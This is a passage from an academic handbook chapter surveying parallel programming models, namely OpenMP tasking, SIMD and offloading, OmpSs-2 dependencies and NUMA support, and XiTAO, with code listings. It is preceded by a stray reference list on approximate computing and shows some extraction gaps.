ACM/EDAC/IEEE design automation conference (DAC), pp 1–9
Choi J, Venkataramani S (2019) Approximate computing techniques for deep neural networks.
Springer, Cham, pp 307–329
Deb K, Pratap A, Agarwal S, Meyarivan T (2002) A fast and elitist multiobjective genetic
algorithm: NSGA-II. IEEE Trans Evol Comput 6(2):182–197
Du K, Varman P, Mohanram K (2012) High performance reliable variable latency carry select
addition. In: Proceedings of the conference on design, automation and test in Europe, DATE’12.
EDA Consortium, San Jose, pp 1257–1262
Esmaeilzadeh H, Sampson A, Ceze L, Burger D (2012) Architecture support for disciplined
approximate programming. In: ACM SIGPLAN notices, vol 47. ACM, pp 301–312
Gillani GA, Hanif MA, Krone M, Gerez SH, Shafique M, Kokkeler AB (2018) Squash: approxi-
mate square-accumulate with self-healing. IEEE Access 6:49112–49128
Gillani G, Hanif MA, Verstoep B, Gerez SH, Shafique M, Kokkeler AB (2019) Macish: designing
approximate MAC accelerators with internal-self-healing. IEEE Access 7:77142–77160
Gupta V, Mohapatra D, Park SP, Raghunathan A, Roy K (2011) IMPACT: imprecise adders for low-
power approximate computing. In: Proceedings of 17th IEEE/ACM international symposium
on low-power electronics and Design, pp 409–414
Hanif MA, Shafique M (2021) A cross-layer approach towards developing efficient embedded deep learning systems. Microprocessors and Microsystems, p 103609
Hanif MA, Hafiz R, Hasan O, Shafique M (2017) Quad: design and analysis of quality-area
optimal low-latency approximate adders. In: DAC design automation conference 2017. ACM,
New York, pp 42:1–42:6
Hashemi S, Tann H, Reda S (2018) BLASYS: approximate logic synthesis using boolean matrix
factorization. In: Proceedings of the 55th annual design automation conference, DAC 2018, San
Francisco, 24–29 June 2018. ACM, pp 55:1–55:6. https://doi.org/10.1145/3195970.3196001
He K, Zhang X, Ren S, Sun J (2015) Deep residual learning for image recognition. CoRR
abs/1512.03385
Hrbacek R, Sekanina L (2014) Towards highly optimized cartesian genetic programming: from
sequential via simd and thread to massive parallel implementation. In: Proceedings of the 2014
annual conference on genetic and evolutionary computation, GECCO’14. ACM, New York,
pp 1015–1022
Jiang H, Liu C, Liu L, Lombardi F, Han J (2017) A review, classification, and comparative
evaluation of approximate arithmetic circuits. J Emerg Technol Comput Syst 13(4):60:1–60:34
Judd P, Albericio J, Hetherington T, Aamodt T, Enright Jerger N, Urtasun R, Moshovos A (2018)
Proteus: exploiting precision variability in deep neural networks. Parallel Comput 73:40–51
Kulkarni P, Gupta P, Ercegovac M (2011) Trading accuracy for power with an underdesigned
multiplier architecture. In: 2011 24th international conference on VLSI design, pp 346–351
Kyaw KY, Goh WL, Yeo KS (2010) Low-power high-speed multiplier for error-tolerant appli-
cation. In: 2010 IEEE international conference of electron devices and solid-state circuits
(EDSSC), pp 1–4
LeCun Y, Bengio Y, Hinton G (2015) Deep Learning. Nature 521(7553):436–444
Li C, Luo W, Sapatnekar SS, Hu J (2015) Joint precision optimization and high level synthesis
for approximate computing. In: Proceedings of the 52nd annual design automation conference,
DAC’15. ACM, New York, pp 104:1–104:6
Lotfi A, Rahimi A, Yazdanbakhsh A, Esmaeilzadeh H, Gupta RK (2016) Grater: an approximation
workflow for exploiting data-level parallelism in FPGA acceleration. In: 2016 design,
automation test in Europe conference exhibition (DATE), pp 1279–1284
Lu SL (2004) Speeding up processing with approximation circuits. Computer 37(3):67–73
Ma J, Hashemi S, Reda S (2019) Approximate logic synthesis using blasys. In: Proceedings of 1st
workshop on open-source EDA technology (WOSET), p 3
Mahdiani HR, Ahmadi A, Fakhraie SM, Lucas C (2010) Bio-inspired imprecise computational
blocks for efficient vlsi implementation of soft-computing applications. IEEE Trans Circuits
Syst I: Regul Pap 57(4):850–862
Mazahir S, Hasan O, Hafiz R, Shafique M (2017a) Probabilistic error analysis of approximate
recursive multipliers. IEEE Trans Comput 66(11):1982–1990
Mazahir S, Hasan O, Hafiz R, Shafique M, Henkel J (2017b) Probabilistic error modeling for
approximate adders. IEEE Trans Comput 66(3):515–530
Mishchenko A, Chatterjee S, Brayton R (2006) Dag-aware aig rewriting: a fresh look at combina-
tional logic synthesis. In: 2006 43rd ACM/IEEE design automation conference, pp 532–535
Mishra AK, Barik R, Paul S (2014) iact: a software-hardware framework for understanding the
scope of approximate computing. In: Workshop on approximate computing across the system
stack (WACAS)
Mohapatra D, Chippa VK, Raghunathan A, Roy K (2011) Design of voltage-scalable meta-
functions for approximate computing. In: Design, automation & test in Europe conference
& exhibition (DATE), 2011. IEEE, pp 1–6
Momeni A, Han J, Montuschi P, Lombardi F (2015) Design and analysis of approximate
compressors for multiplication. IEEE Trans Comput 64(4):984–994
Mrazek V, Sarwar SS, Sekanina L, Vasicek Z, Roy K (2016) Design of power-efficient approximate
multipliers for approximate artificial neural networks. In: Proceedings of the 35th international
conference on computer-aided design, ICCAD’16. ACM, New York, pp 81:1–81:7
Mrazek V, Hrbacek R, Vasicek Z, Sekanina L (2017) Evoapprox8b: library of approximate adders
and multipliers for circuit design and benchmarking of approximation methods. In: Design,
automation test in Europe conference exhibition (DATE), 2017, pp 258–261
Mrazek V, Vasicek Z, Hrbacek R (2018) The role of circuit representation in evolutionary design
of energy-efficient approximate circuits. IET Comput Digit Tech 12(4):139–149
Mrazek V, Hanif MA, Vasicek Z, Sekanina L, Shafique M (2019a) AutoAx: an automatic design
space exploration and circuit building methodology utilizing libraries of approximate compo-
nents. In: Proceedings of the 56th annual design automation conference 2019. Association for
Computing Machinery, New York
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1070
Hardware Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1070
Constructs in Parallel Programming Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1071
Taxonomy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1072
The OpenMP Programming Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1074
The Worksharing Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1076
The Tasking Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1077
SIMD Support in OpenMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1079
The Accelerator Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1085
The OmpSs-2 Programming Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1087
Advanced Dependency System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1087
Exploiting Structured Parallelism on Many-Core Processors . . . . . . . . . . . . . . . . . . . . . . . 1091
OmpSs-2 NUMA Support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1093
The XiTAO Programming Model and Runtime . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1096
Explicit DAG Programming in XiTAO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1096
Software Topologies and Locality-Aware Programming . . . . . . . . . . . . . . . . . . . . . . . . . . 1098
M. N. Farooqi
Leibniz Supercomputing Centre of the Bavarian Academy of Sciences and Humanities, Munich,
Germany
e-mail: [email protected]
M. Abduljabbar
The Ohio State University, Columbus, USA
e-mail: [email protected]
M. Pericàs ()
Chalmers University of Technology, Gothenburg, Sweden
e-mail: [email protected]
V. Beltran · X. Teruel · R. Ferrer · X. Martorell
Barcelona Supercomputing Center, Barcelona, Spain
e-mail: [email protected]; [email protected]; [email protected]; [email protected]
Abstract
Keywords
Introduction
Hardware Models
Taxonomy
Parallel programming models are highly dependent on the underlying hardware and are usually developed for specific hardware. Two main hardware features that provide a basis for classifying programming models are the memory organization and the heterogeneity of the compute hardware. On the basis of memory, parallel programming models can be classified into three types: shared memory models, distributed memory models, and distributed shared memory models, while heterogeneity in the compute hardware gave rise to accelerator models. A hybrid approach can be taken to combine some of these models depending on the machine model. Figure 1 shows a
taxonomy of the parallel programming models with examples. Next, these models are described separately.
Fig. 1 Taxonomy of parallel programming models showing the levels of a parallel computer system and associated programming models highlighted in green boxes
Distributed memory models: These models are used to write programs for execution on distributed memory systems, where data among processes is communicated through synchronous/asynchronous messages. Unlike shared memory models, distributed memory models avoid data races and can scale beyond a single node, making them suitable for large problems that cannot fit in a single machine. The Message Passing Interface (MPI) is an example of a distributed memory model.
Heterogeneous models: These are the programming models for accelerators. Many of the programming models in this category are developed by hardware vendors and are specific to their devices (e.g., CUDA), while others, such as OpenCL and SYCL, are portable standards.
The OpenMP Programming Model

OpenMP 4.0 (OpenMP Architecture Review Board 2013) introduced the offloading model, allowing programmers to take advantage of the accelerator devices attached to the SMP architecture. All of these additions improved the way programmers can express the inherent parallelism of their applications. The current version, OpenMP 5.x (OpenMP Architecture Review Board 2020), has not introduced any new sub-model per se, but it improves certain features of the existing ones. A major contribution of the latest version is the standardization of the interaction between the OpenMP runtime and third-party tools, including performance and debugging tools.
The OpenMP execution model is based on the creation of successive parallel
regions separated by sequential regions. That is, it allows annotating code regions that will be executed by multiple threads, while non-annotated code regions will be
executed only by the initial thread. Within a parallel region, programmers can also
define certain code subregions that can distribute the associated work among the
multiple threads participating in it. Perhaps one of the most used OpenMP features
is the for directive (do in Fortran); this directive allows dividing the iteration space
associated with a loop among the different threads participating in the region.
Additionally, a parallel region can also be used for task execution. The specification defines safe points in the execution of the program where threads can look for new work to execute from the ready task pool. A fairly common use case creates a parallel region with multiple threads, restricts the execution to a single thread, and instantiates multiple tasks. Although the encountered code executes on only one thread, any member of the team is a candidate to execute the instantiated tasks. This scenario can be described as one producer, i.e., one thread creates all the tasks, and multiple consumers, i.e., all threads participating in the parallel region execute these tasks.
Apart from these two programming sub-models, both based on the fork-join
design pattern, OpenMP additionally offers a complementary pattern that allows
code vectorization using the SIMD directives. Although this parallel approach
can exist on its own, it is usually combined with other directives allowing the
loop parallelization. Thus, the first level of parallelism divides the work between
threads, while a second level exploits the internal parallelism offered by the vector
instructions of the processor.
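As a brief illustration of this two-level scheme (this sketch is not one of the chapter's listings), the loop below distributes its iterations among threads and vectorizes each thread's chunk:

#include <stddef.h>

/* Two-level parallelism: worksharing across threads, SIMD within a chunk. */
void saxpy(size_t n, float a, const float *x, float *y)
{
    #pragma omp parallel for simd
    for (size_t i = 0; i < n; i++)
        y[i] = a * x[i] + y[i];
}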
Once the OpenMP execution model has been introduced, it is necessary to pay attention to its memory model. OpenMP defines a shared memory model with relaxed consistency. This means that all threads can access the whole memory space (at least the host memory space; this situation changed once the offload sub-model was introduced) and read or write any shared variable. Even so, the model offers only “relaxed” consistency: threads do not see, or make visible, the changes they make at arbitrary times, but only at specific points of the execution. To guarantee consistency, the model defines flush operations (also related to the flush directive) and includes this operation implicitly in those constructs that may require it. For example, after an OpenMP barrier, programmers have the guarantee that all the changes made by the different threads of the team are visible to the rest of the members (and, therefore, that any thread can see the changes made by the rest of the team). The definition of these implicit flushes facilitates
the programming of the application, making the use of this model transparent (in
most cases) to the programmer.
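As an illustration of these guarantees, consider the following sketch (our example, not from the chapter): the barrier implies a flush, so the write performed by thread 0 is guaranteed to be visible to thread 1 afterwards.

#include <omp.h>
#include <stdio.h>

void visibility_example(void) {
    int shared_value = 0;
    #pragma omp parallel num_threads(2) shared(shared_value)
    {
        if (omp_get_thread_num() == 0)
            shared_value = 42;             /* write by thread 0 */
        #pragma omp barrier                /* implied flush: the write becomes
                                              visible to the whole team */
        if (omp_get_thread_num() == 1)
            printf("%d\n", shared_value);  /* guaranteed to print 42 */
    }
}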
The memory model changes when using devices (i.e., in the offload sub-model).
In these cases, it will be the programmer who will define the correct order, in
terms of data movements, between the host and the device, and vice versa. For this
purpose, the map clause is available in the language. Examples of its use will be
shown in section “The Accelerator Model”.
OpenMP has been adopted by a great variety of C, C++, and Fortran compilers, from the major commercial compilers, like those of Intel, IBM, Fujitsu, Texas Instruments, or Oracle, to purely open-source approaches, like the GNU Compiler Collection, Mercurium, Rose, or OpenUH compilers. In recent years, hybrid approaches between open-source and commercial initiatives have also emerged around LLVM-based compilers, like those of AMD, Clang, Flang, or PGI. Some of the compilers mentioned above serve academic purposes and are used
as rapid prototyping mechanisms for the study of new proposals for the standard.
This is the case of the Mercurium compiler, used for the implementation of the
OmpSs/OmpSs-2 programming model (see section “The OmpSs-2 Programming
Model”).
Concerning the HPC community, the standard has been adopted in many
different ways: from programming exclusively using OpenMP for small problem
size workloads (still requiring multi-threaded capabilities) to hybrid approaches in
the form of MPI + OpenMP, where it is used as a second level of parallelization,
exploiting the intra-node parallelism. Since version 4.0, it has also been considered a programming mechanism for accelerator devices attached to the host.
runtime will dynamically assign each of them among all the threads participating in
the parallel region (schedule policy). Lines 4–6 contain the original user code.
A second parallelization approach is possible when the code has several blocks
that can be executed concurrently. In this case, there is not an iteration space that
can be distributed among threads, but each of these blocks can still be assigned to a different thread, exploiting the program's parallelism.
Listing 2 shows a region of code including function calls that can potentially
be executed in parallel. The annotation of the code begins with the opening of the
parallel region (line 1), the opening of the context of the sections construct (line
3), and the demarcation of each of these sections (lines 5, 7, and 9).
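Since Listing 2 itself is not reproduced here, the following minimal sketch (with illustrative function names) shows the structure just described:

#pragma omp parallel              /* opens the parallel region (line 1) */
{
    #pragma omp sections          /* opens the sections context (line 3) */
    {
        #pragma omp section       /* first block (line 5) */
        compute_first();
        #pragma omp section       /* second block (line 7) */
        compute_second();
        #pragma omp section       /* third block (line 9) */
        compute_third();
    }
}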
The previous section has shown the parallelization of code blocks using OpenMP.
This section still focuses on task parallelism but uses task-related directives. As will
be shown, OpenMP tasks are a generalization of the work-sharing sections construct, providing greater expressiveness and richer semantics for parallel codes.
A task is a work unit that contains (1) user code; (2) the data associated with
that code; and (3) a set of internal variables that will determine its behavior. In a
way, programmers can use tasks to implement code where sections were used. The
code in Listing 3 shows a direct translation of the code that was previously shown
in Listing 2. In this new example, the parallel region is still present, but instead of
using the work-sharing sections construct, a single directive is inserted. This means that just one thread takes care of creating all the tasks. It is important to note that although a single thread creates the tasks, all the threads participating in the team collaborate in their execution. The parallelization of the source code is
completed by including the task annotations (lines 5, 7, and 9).
Coming back to one of the restrictions mentioned before, the number of sections
should be known at compile time. This restriction does not apply when using tasks.
The code in Listing 4 shows the initialization of a list of elements by using a while
loop (lines 7–12). In this case, loop work-sharing cannot be used (since it requires
the canonical form of a for loop, where the number of iterations must be known at
the entry point), and it is also not possible to use the sections construct, due to
the restriction previously mentioned. Using tasks, however, is a fairly common and
natural pattern for this case.
8        #pragma omp task depend(out: list)
9          initialize(list->elem);
10
11         list = list->next;
12       }
13
14
15
16       list = begin;
17
18       while (list != NULL) {
19         #pragma omp task depend(inout: list)
20           compute(list->elem);
21
22         list = list->next;
23       }
24     }
25   }
Tasks also require certain synchronization points. In the example above, to start
the second while loop, the initialization tasks must have completed. This is
achieved with the taskwait directive (line 14), which allows to wait for all the
tasks created up to that moment.
Despite the correct use of the taskwait directive, OpenMP offers other
mechanisms that allow defining the correct order of task executions: dependencies.
The depend clause allows to annotate a task according to the data it is using. In
this way, the OpenMP runtime will take care of computing all the possible data
dependencies between them. The code in Listing 5 uses this new synchronization
approach. The code does not need the taskwait directive anymore. The cor-
responding annotations on the task side have been added (lines 8 and 19). This
modification not only guarantees the correct order but also achieves a finer grain of
synchronization. That is, to compute an element of the list (second while loop,
line 19), it is not required that the initialization of all the elements in the list (first
while loop) has completed, but it is enough to wait only for the element that is
currently being computed.
The depend clause supports several types of modifiers. The most common are
in (read), out (write), and inout (update), which allow the usual computation of
dependencies: RaW (Read-after-Write), WaR (Write-after-Read), and WaW (Write-
after-Write).
To address this issue, compiler vendors offer different options. One option is a set
of annotations so the user can state the facts that the compiler cannot prove. These
annotations come in the form of vendor-specific pragma constructs or assume
intrinsics. Via the reports of the compiler, a user can identify what is actually
preventing vectorization. If the fact is true but cannot be proved by the compiler,
some form of annotation can enable vectorization again. This is a form of semi-automated vectorization in which the bulk of the work is still handled by the
compiler. For instance, it is possible to annotate the alignment of a memory buffer
as a fact to be used by the compiler. Some architectures impose memory alignment
constraints, or can use more efficient instructions, when loading or storing vectors
from or to memory. Annotations can be pushed further so the user can fully override
correctness checks. For instance, the user can state that it is correct to vectorize a
loop, irrespective of the actual fact. In general, these kinds of annotations are often
not portable between compilers.
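One concrete, compiler-specific realization of such an annotation is the __builtin_assume_aligned builtin of GCC and Clang; the sketch below (our example) states an alignment fact that the compiler cannot prove:

void scale(float *restrict v, float a, int n) {
    /* Assert, without proof, that v is 32-byte aligned, e.g. because it
       was obtained from aligned_alloc(32, ...). If the assertion is
       false, the behavior is undefined. */
    float *va = __builtin_assume_aligned(v, 32);
    for (int i = 0; i < n; i++)
        va[i] *= a;
}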
Another option is to use architecture-specific compiler intrinsics. These give maximum control to the user, but at the cost of higher programming effort. They are in practice
closer to assembly programming because those intrinsics often offer a one-to-one
correspondence to the corresponding SIMD instruction. This is a form of manual
vectorization as the compiler offers little assistance and the user needs to take all
the decisions. Hardware vendors push for standardized low-level intrinsics so they
can be used in different compilers, but those intrinsics are obviously non-portable
between architectures.
Listing 7 shows a SAXPY kernel, and Listing 8 shows its manual vectorization using RISC-V Vector Extension intrinsics (RISC-V Community 2021). Compiler intrinsics provide a lot of control. This example shows
how the programmer has to make explicit a number of low-level details when
using intrinsics: vector loads (vle32_v_f32m8), vector stores (vse32_v_-
f32m8), and even a contraction of the addition and multiplication using a specific
float-multiply operation (vfmacc_vf_f32m8). Another detail of the RISC-V
architecture that pervades the code when using intrinsics is the need to request a
vector length (vsetvl_e32m8) that is then passed to all the intrinsics and also
used to advance the loop.
Listing 8 Manual vectorization of the SAXPY kernel using RISC-V Vector Extension intrinsics

1  #include <riscv_vector.h>
2
3  void saxpy(size_t n, float a, const float *x,
4             float *y) {
5    for (int i = 0; i < n; ) {
6      size_t vl = vsetvl_e32m8(n - i);
7      vfloat32m8_t vx, vy;
8      vx = vle32_v_f32m8(&x[i], vl);
9      vy = vle32_v_f32m8(&y[i], vl);
10     vy = vfmacc_vf_f32m8(vy, a, vx, vl);
11     vse32_v_f32m8(&y[i], vy, vl);
12     i += vl;
13   }
14 }
SIMD Loops
OpenMP SIMD, available as of version 4.0, provides a mechanism for semi-
automated vectorization. OpenMP pragmas act as annotations with the added benefit
that they are portable between compilers and architectures.
The main construct that enables SIMD support in OpenMP is the simd directive.
This directive must immediately go before a loop and states that the iterations of
the loop can be concurrently executed using SIMD instructions. A SIMD loop is
executed by grouping the iterations of the original loop into chunks of consecutive
iterations. The iterations in a single chunk are executed concurrently via SIMD
instructions.
When using the simd directive, the compiler does not have to check the correctness of the vectorized loop. This is an important distinction from some approaches that use annotations: in those, the compiler adds the facts provided by the user to the facts it can prove itself. In OpenMP the compiler assumes
the programmer has assessed the validity of concurrent execution using SIMD
instructions. Under these circumstances a compiler can skip a large part of the
correctness analysis. However, there are still a number of decisions to be taken when
vectorizing the code. OpenMP SIMD gives a lot of flexibility and control to the user
to describe many facts about the loop being vectorized. This is done via a number
of clauses.
• simdlen. The user can specify the preferred size of the chunk. This roughly
corresponds to the vector length. Some architectures, mostly due to historical
reasons, provide different vector lengths, and it may be necessary to specify the
precise length due to their memory access patterns. Some loops may have slightly
better performance when the chunk is reduced.
• safelen. Section “Vectorization, Intrinsics, and Semi-automatic Vectoriza-
tion” has mentioned that loop-carried dependences must fit a vector. In OpenMP
SIMD terms, this means that an iteration of a chunk cannot generate a value that
is used by other iterations of the same chunk. A simple example is a loop that does
a[i+5] = a[i] + 1;. If we use a vector longer than 5 elements, a chunk
can be concurrently doing a[5] = a[0] + 1; a[10] = a[5] + 1;
which gives unpredictable semantics to the value of a[5] (see the sketch after this list).
Describing how values evolve across the iterations of a loop allows the compiler to emit more efficient code for the purpose of vectorization.
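For illustration, the dependence-distance example above can be annotated as follows (a minimal sketch; the array a and the bound n are assumed):

void shift_add(int *a, int n) {
    /* The loop-carried dependence has distance 5, so up to 5 consecutive
       iterations may safely execute concurrently; safelen(5) communicates
       this bound to the compiler. */
    #pragma omp simd safelen(5)
    for (int i = 0; i + 5 < n; i++)
        a[i + 5] = a[i] + 1;
}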
Listing 9 shows the loops in Listing 6 explicitly annotated with the simd
directive. The directives inform the compiler that it is safe to vectorize the loops.
Function Vectorization
OpenMP SIMD imposes a number of constraints on a simd loop; for instance, not all OpenMP constructs can be used in the body of the loop. However, calls to
other functions in the loop body are allowed. This opens a number of possibilities
when vectorizing code that makes function calls.
Traditionally, a loop that needs to call a function had the code of the invoked
function inlined. This frees the vectorization algorithm from needing special support for function calls. However, it may not always be possible to inline functions, especially
if they come from optimized libraries.
OpenMP SIMD allows the creation of SIMD versions of existing functions so
they can be called from the body of a simd loop. This can be done using the
declare simd directive. Calling a SIMD function from a SIMD loop means, in general, that the scalar types of the parameters and the return value of the function are replaced by vector types.
Similar to the simd directive, OpenMP SIMD provides a lot of control regarding
the SIMD function via clauses. These clauses are applied to the parameters of the
function.
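A minimal sketch of a SIMD function (names are illustrative; the uniform clause marks a parameter that is broadcast, unchanged, across all SIMD lanes):

#pragma omp declare simd uniform(scale)
float apply_gain(float x, float scale) {
    return x * scale;
}

void process_signal(float *out, const float *in, float scale, int n) {
    #pragma omp simd
    for (int i = 0; i < n; i++)
        out[i] = apply_gain(in[i], scale);  /* called with vector arguments */
}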
With the advent of heterogeneous platforms, mainly consisting of SMP cores and
Graphics Processing Units (GPUs), and the possibility to use the latter for com-
puting, OpenMP needed to improve programmability in these environments. To this end, it incorporated a new directive, target, to drive code generation towards accelerators.
There are two main uses of the target directive: (i) indicating code regions that should be translated for the accelerator and, if possible, executed there and (ii) indicating extended code regions for which a collection of data must be placed in the accelerator memory. Listings 12 and 13 show these two main uses.
When working with accelerators, the execution environment must ensure that
data is in the address space of the target accelerator. OpenMP achieves this goal by
allowing the expression of the variables that need to be moved in and out of the
accelerator memory: the map clause.
The map clause is used in both target and target data directives. It accepts a
qualified list of symbols. For each one, data transfers are implemented following
the qualifiers:
• to: data is moved to the accelerator prior to the execution of the code region.
• from: data is moved from the accelerator back to the host memory space after the execution of the code region.
• tofrom: data is moved to the accelerator before the execution of the task and back after the execution.
Additional qualifiers (alloc, release, delete) allow managing the mapping of the data directly on the accelerator.
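For illustration, a minimal sketch of the clause in use (our example, assuming arrays of n floats):

void saxpy_target(float *y, const float *x, float a, int n) {
    /* x is copied to the accelerator before the region executes,
       and y is copied back to the host afterwards. */
    #pragma omp target map(to: x[0:n]) map(from: y[0:n])
    #pragma omp parallel for
    for (int i = 0; i < n; i++)
        y[i] = a * x[i];
}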
Listing 14 shows the list traversal program, annotated to spawn work on an accel-
erator. The accelerated work is the initialization (lines 8–9) and the computation
(lines 17–18) associated with each list element. The target directive behaves as a task, and it can also be provided with data directionality hints to implement a dataflow graph.
OmpSs-2 is a data-flow programming model that extends and refines the original
tasking model proposed in OmpSs (Duran et al. 2011) to cope with the increase in
size, complexity, and heterogeneity of future Exascale systems. To that end, OmpSs-
2 provides several advanced features, including a powerful dependency system that
supports dependencies across different nesting levels and advanced dependency
types such as concurrent, commutative, and task reductions; and support for exploiting large many-core processors as well as NUMA systems. It is worth noting that all
these features, implemented in the Mercurium compiler and Nanos6 runtime system,
have been designed to be freely combined to ease the development of complex
applications.
On the other hand, it allows the runtime to control dependencies at a fine grain that, until now, was only possible using a single domain of dependencies.
The combination of nesting and dependencies has three aspects that can be
improved:
• The presence of the taskwait directive delays the completion of the enclosing task
and thus the release of the system or user-level thread and its stack.
• A task with subtasks cannot incrementally release its own dependencies and those of its subtasks. Instead, they are all released together once the task and
all of its subtasks have finished.
• The presence of elements in the depend clause that are only needed by subtasks
defers task start even when only subtasks need to be deferred.
Weak Dependencies
On a parent task, each element of the depend clause may be needed only by the task
itself, only by its subtasks, or by both. The elements that are only needed for the
subtasks only serve as a mechanism to link the outer domain of dependencies to the
inner one. In this sense, allowing these elements to defer the execution of the task
is unnecessary, since the task does not actually perform any conflicting accesses by
itself.
For this reason it has been proposed to extend the depend clause with three
additional dependency types: weakin, weakout, and weakinout. Their semantics are
analogous to the ones without the weak prefix. However, the weak variants indicate
that the task does not perform by itself any action that requires the enforcement of
the dependency. Instead those actions might only be performed by any of its nested
subtasks. Any subtask that might directly perform those actions needs to include the
element in its depend clause in the non-weak variant. In turn, if the subtask delegates
the action to a subtask, the element must appear in its depend clause using at least
the weak variant. Weak variants do not imply a direct dependency and thus do not
defer the execution of tasks. Their purpose is to serve as a linking point between
the dependency domains of each nesting level. Weak dependencies, combined with
the fine-grained release of dependencies, merge the inner dependency domain of
a task into that of its parent. Since this happens at every nesting level, the result is
equivalent to an execution in which all tasks had been created in a single dependency
domain. For more details please refer to Perez et al. (2017).
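A hedged sketch of this mechanism in OmpSs-2-style syntax follows (the clause spelling and the array-section notation v[start;length] follow common OmpSs-2 usage but may vary across versions):

/* The parent task only coordinates, so it declares a weak access that
   links the outer and inner dependency domains; the subtask declares
   the real (strong) access and performs the write. */
#pragma oss task weakout(v[0;N])
{
    #pragma oss task out(v[0;N])
    initialize(v, N);
}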
• concurrent: The concurrent dependence type behaves as the inout type with
respect to in, out, and inout types, but has the particularity that no dependencies
are enforced over other sibling tasks that define a concurrent type over the same
memory reference. This dependency type has been introduced in OpenMP 5.1 as inoutset.
• commutative: The commutative dependence type behaves as the inout type with
respect to in, out, and inout types. It also enforces a dependence over other
sibling tasks that define a commutative type over the same memory reference, but
this dependence allows any order of execution between those tasks (as opposed
to creation order). Any permutation ordering of those tasks annotated with
commutative is correct, as long as only one of those tasks is executed at a time.
This dependency type has been introduced in OpenMP 5.0 as mutex_inoutset.
• reduction: As far as the interaction between dependence types is concerned, the
reduction type behaves just as the concurrent type. The difference between them
is that the last task annotated with a reduction clause will also be responsible for
computing a reduction, but this has no implications from the point of view of the
dependence model.
It is worth mentioning that reductions are also supported with array types (Pallares
et al. 2019). To that end, the Nanos6 runtime system provides all the logic required
to transparently manage private data copies and dynamically reduce them when
they are required. This provides a seamless integration of reductions with other
dependency types, without requiring any explicit scoping or global synchronization
like in OpenMP reductions. Listing 16 shows how array reductions can be used to
calculate the histogram of a set of images. In this example, the task loop construct is
used to parallelize with tasks the inner loop, which computes the histogram of one
single image. However, the use of array reductions enables the runtime system to
process images belonging to different iterations in parallel.
There are many situations where the problem size per core is not optimal, jeopardizing the benefits of using tasks.
A worksharing task is like a regular task in this sense, and the synchronization
is done through data dependencies or explicit synchronization points. Note that
the data dependencies of the worksharing tasks are released when the last chunk
is finished by the thread that runs that last chunk. As in a worksharing construct, the iteration space of the for-loop is partitioned into chunks of chunksize iterations. The
key point is that these chunks do not have the usual overheads associated with a
task – such as memory allocation and dependency management. To run a chunk, a
thread only needs the boundaries of that chunk and the data environment, much like
worksharing constructs. So, in summary, a worksharing task can be run in parallel
by multiple threads, better amortizing the task management overheads. Moreover,
worksharing tasks enlarge the set of granularities that deliver good performance. In
scenarios where only a few tasks are created and these are not enough to keep all
the resources busy, the use of worksharing tasks mitigates the lack of parallelism.
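A hedged sketch of a worksharing task (the construct and clause names follow the worksharing-tasks proposal; the exact spelling may vary):

double f(double x);                   /* placeholder computation */

void map_array(const double *a, double *b, int N) {
    /* One task, one set of dependencies; the iteration space is split
       into chunks that several threads execute cooperatively. */
    #pragma oss task for chunksize(1024) in(a[0;N]) out(b[0;N])
    for (int i = 0; i < N; i++)
        b[i] = f(a[i]);
    #pragma oss taskwait              /* wait for the worksharing task */
}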
offers a lot of possibilities. For instance, Listing 18 shows (1) how to spread data
among all the available NUMA nodes (lines 6–8), (2) how to allocate all the data
in a single NUMA node (lines 10–15), and (3) how to distribute data using a block-
cyclic policy among all the available NUMA nodes (lines 17–20).
the location of accesses. If either the parent or the predecessor of a created task has
information about the location of an access, the runtime does not query the directory.
In practice, this means that only the first task that accesses a data region performs a
query, and all the rest are able to obtain it by propagation, reducing the number of queries by up to a few orders of magnitude. Thanks to these optimizations,
the overhead of the data-tracking mechanism is negligible when using adequate
granularities.
Evaluation (Maroñas et al. 2021) has shown that the approach outperforms other state-of-the-art approaches, such as the use of numactl, across several benchmarks and platforms, reaching the optimal speedup in several of them. Specifically, Nanos6 has been shown to
obtain up to 2× speedup in a machine with two NUMA nodes and up to 7.1×
speedup in a machine with 8 NUMA nodes, compared to the performance of running
with a single NUMA node.
The XiTAO API has two levels. At the lower level is the explicit DAG interface,
which allows constructing computational DAGs by creating new task assemblies
(TAOs) and connecting them with edges. At the higher level lies the data-parallel
interface which is described later.
XiTAO provides low-level constructs to describe TAO objects as C++ classes
and interconnect them into a TAO-DAG. Listing 19 shows simplified structures of
the base AssemblyTask class, a minimal TAO class, and the basic XiTAO API.
TAOs are specified as derived classes from the base AssemblyTask class. The
AssemblyTask needs to be initialized with a resource width and, optionally, an
address in the software topology, which in the shown example (bottom of Listing 19)
corresponds to a 1D torus topology. TAOs can be created and pushed into the
WSQs both before and after execution starts (via xitao_start()). Dynamic
generation of TAOs is critical to support irregular TAO-DAGs. An example dot
product code in XiTAO and the corresponding DAG are shown, respectively, in
Listing 20 and Fig. 2.
23
24   // Create the TAO-DAG
25   for (int j = 0; j < numvm; j++) {
26     vm[j] = new VecMul(A + j*block, B + j*block,
27                        C + j*block, block, width);
28     // Create an edge
29     vm[j]->make_edge(va);
30     // Push current root to queue
31     xitao_push(vm[j]);
32   }
33
34   // Start the TAO-DAG execution
35   xitao_start();
36   // Finalize and claim resources back
37   xitao_fini();
38 }
The initial TAO resource widths (i.e., the number of worker threads to execute the
